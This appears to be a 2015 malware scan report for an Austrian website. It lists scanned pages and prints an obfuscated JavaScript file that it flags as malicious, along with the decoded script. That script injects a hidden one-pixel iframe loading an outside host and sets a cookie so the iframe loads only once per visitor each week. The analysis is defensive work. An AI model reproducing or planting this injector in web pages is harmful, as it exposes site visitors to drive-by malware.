Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hoertnagel.at
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hoertnagel.at/ | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:18 GMT Location: http://members.aon.at/ahortnag Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 15:29:18 GMT Location: http://members.aon.at/ahortnag/ Server: Apache Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from members.aon.at | clean |
http://members.aon.at/ahortnag/ | 200 OK Content-Length: 5144 Content-Type: text/html | clean |
http://members.aon.at/ahortnag/newgeocheck.js | 200 OK Content-Length: 7265 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var geocheck = true;
var secureNewgeoB;if(secureNewgeoB!='' && secureNewgeoB!='mIR'){secureNewgeoB='fKDE'};this.zAP=30722;var gECheck;var xP=false;
gECheck='f8faf9fcfafff5ffb9e1cafbdee7f4d9f3f7e3e2f9e3f1b6a2eef9fbdfc8b9bcf4e8f8f3e'+
'ff0cdc9ede9aeb8e8f6dec5b7bff4cbd3eaf0e6b092e7effae6f9fca1aae29480a7ba8ef4'+
'ffb8a2ecf3f7f3fff1fffbe0e8a0a6f09784bbabb694baa2eef9e59ba8b3a7acb0eca1e4e'+
'cd4f18fe8e0e8a494a4ba80bbadbb9e99b1f9efd9dff8f5b2d7cde0fcd9e0cd91f4c4d8e8'+
'e8fa8dc8f6fed7f
Decoded script:
function setCookie(name, value, expiredays, path, domain, secure) {
  if (expiredays) {
    var exdate=new Date();
    exdate.setDate(exdate.getDate()+expiredays);
    var expires = exdate.toGMTString();
  }
  document.cookie = name + "=" + escape(value) +
    ((expiredays) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
fu } return setStr; }
var user = getCookie("secheck");
if (user !=777){
  document.write('<iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' );
  setCookie("secheck", "777", 7, "/");
}
<iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Antivirus reports:
http://www.hoertnagel.at/seite_harmonika.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:19 GMT Location: http://members.aon.at/ahortnag/seite_harmonika.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite_harmonika.htm | 200 OK Content-Length: 15482 Content-Type: text/html | clean |
http://members.aon.at/ahortnag/images/23pal_gros.gif | 200 OK Content-Length: 70973 Content-Type: image/gif | clean |
http://members.aon.at/test404page.js | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:20 GMT Location: http://www.a1.net Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://www.a1.net/ | 200 OK Content-Length: 73677 Content-Type: text/html | clean |
http://cdn3.a1.net/final/de/js/jquery-min.js | 200 OK Content-Length: 187747 Content-Type: application/javascript | clean |
http://cdn1.a1.net/final/de/js/bundle_start.js | 200 OK Content-Length: 150253 Content-Type: application/javascript | clean |
http://cdn2.a1.net/final/de/js/tracking.js | 200 OK Content-Length: 165970 Content-Type: application/javascript | clean |
http://cdn3.a1.net/final/de/js/trackEvents.js | 200 OK Content-Length: 2426 Content-Type: application/javascript | clean |
https://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 10722 Content-Type: text/javascript | clean |
https://ta.mopinion.nl/custom/ta/mopinion.min.js | 200 OK Content-Length: 44377 Content-Type: application/javascript | clean |
http://members.aon.at//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:25 GMT Location: http://www.a1.net Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://www.a1.net/test404page.js | HTTP/1.1 404 Not Found Cache-Control: no-cache Connection: close Date: Mon, 02 Mar 2015 15:29:25 GMT Pragma: no-cache Location: / Server: Server Vary: Accept-Encoding,User-Agent Content-Encoding: identity Content-Language: de Content-Length: 37891 Content-Type: text/html; charset=utf-8 Expires: Mon, 02 Mar 2015 15:29:25 GMT Lsrequestid: 220123177 Set-Cookie: JSESSIONID=F95C48695541D5B2644B35E656C42773.b155d113-9598-3bb8-9fba-40e622b16e46; Path=/cps Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/ Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/ Set-Cookie: aaaStaticCookie=lvpaaa1;path=/;domain=.a1.net; HttpOnly | clean |
http://www.hoertnagel.at/seite%2023.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:26 GMT Location: http://members.aon.at/ahortnag/seite%2023.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2023.htm | 200 OK Content-Length: 2351 Content-Type: text/html | clean |
http://www.hoertnagel.at/images/33_b.gross.gif | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:27 GMT Location: http://members.aon.at/ahortnag/images/33_b.gross.gif Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/images/33_b.gross.gif | 200 OK Content-Length: 122308 Content-Type: image/gif | clean |
http://www.hoertnagel.at/seite%2033.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:27 GMT Location: http://members.aon.at/ahortnag/seite%2033.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2033.htm | 200 OK Content-Length: 6124 Content-Type: text/html | clean |
http://www.hoertnagel.at/seite%2034.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:28 GMT Location: http://members.aon.at/ahortnag/seite%2034.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2034.htm | 200 OK Content-Length: 10275 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hoertnagel.at
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hoertnagel.at
Referer: http://www.google.com/search?q=hoertnagel.at
Result:
The result is similar to the first query. There are no suspicious redirects found.